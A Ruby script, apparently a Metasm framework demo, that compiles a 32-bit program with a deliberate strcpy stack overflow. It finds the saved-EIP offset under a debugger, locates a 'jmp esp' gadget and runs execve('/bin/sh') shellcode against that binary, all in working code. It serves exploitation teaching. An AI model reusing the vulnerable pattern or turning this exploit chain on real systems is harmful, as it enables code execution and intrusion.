require 'metasm'
include Metasm

ELF.compile_c(Ia32.new, <<EOS).encode_file('vuln')
int strcpy(char*, const char*);
int main(int argc, char **argv) __attribute__((export))
{
	char buf[256];
	if (argc < 2)
		return -6913;
	strcpy(buf, argv[1]);
	return 0;
}
EOS

puts '[*] automatic exploitation', '[*] http://metasm.cr0.org/'

target = './vuln'

bin = AutoExe.decode_file target
dasm = bin.disassemble('main')
retaddr = dasm.function_at('main').return_address.first

puts '[*] main ends at 0x%x' % retaddr

dbg = nil
saved_eip_offset = 0
loop do
	dbg = OS.current.create_debugger [target, 'A'*saved_eip_offset]
	puts '[+] trying arg size %d' % saved_eip_offset
	dbg.go retaddr
	
	saved_eip = dbg[:esp, 4]

	if saved_eip == 'AAAA'
		puts '[*] own eip with %d' % saved_eip_offset
		break
	end

	dbg.kill
	dbg.wait_target

	saved_eip_offset += 4
end

new_ret_addr = nil
jmpesp = Shellcode.assemble(Ia32.new, 'jmp esp').encode_string
dbg.os_process.mappings.each { |addr_start, length, perms, file|
	addr_start = dbg.pc & ~0xfff ; length = 0x1000
	if perms.include? 'x' and off = dbg[addr_start, length].index(jmpesp)
		new_ret_addr = addr_start + off
		break
	end
}

abort '[-] no jmp esp' if not new_ret_addr
puts '[*] jmp esp found at 0x%x' % new_ret_addr

buf = Shellcode.assemble(Ia32.new, <<EOS).encode_string('patched_ret' => new_ret_addr)
#include <asm/unistd.h>
.pad 'A'
dd patched_ret
.offset #{saved_eip_offset}
push __NR_execve
pop eax
xor ecx, ecx
mov edx, ecx
push edx
push '//sh'
push '/bin'
mov ebx, esp
int 80h
EOS

p buf
system target, buf